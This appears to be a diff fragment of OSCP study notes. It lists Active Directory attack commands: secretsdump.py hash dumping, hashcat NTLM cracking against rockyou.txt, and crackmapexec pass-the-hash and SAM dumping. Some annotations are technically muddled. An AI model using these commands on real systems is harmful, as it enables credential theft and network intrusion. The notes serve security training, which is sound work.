AbdullahZuhair21/OSCP-Notes/README.md

 .          use netexec if creackmapexec langing
 .          secretsdump.py raman.local/machine1:to0or@10.10.16.14 -use-vss    (dump the hashes without metasploit)
 .          secretsdump.py machine1:@10.10.16.14 -hashes <hash>     (dump the hashes without metasploit) .          hashcat -m <ntlm mode ex.
-1000> ntlm.txt rockyou.txt     (you only need to put the NTLM portion from NT:NTLM in the ntlm.txt file)
+1000> ntlm.txt rockyou.txt     (you only need to put the NTLM portion from LM:NTLM in the ntlm.txt file)
 .          crackmapexec smb <ip/CIDR> -u <user> -d raman.local -p <password>     (pass the password) .          crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth     (pass the hash) (only work on NTLMv1, for NTLMv2 can be relayed)
 .          crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --sam    (dump the sam database)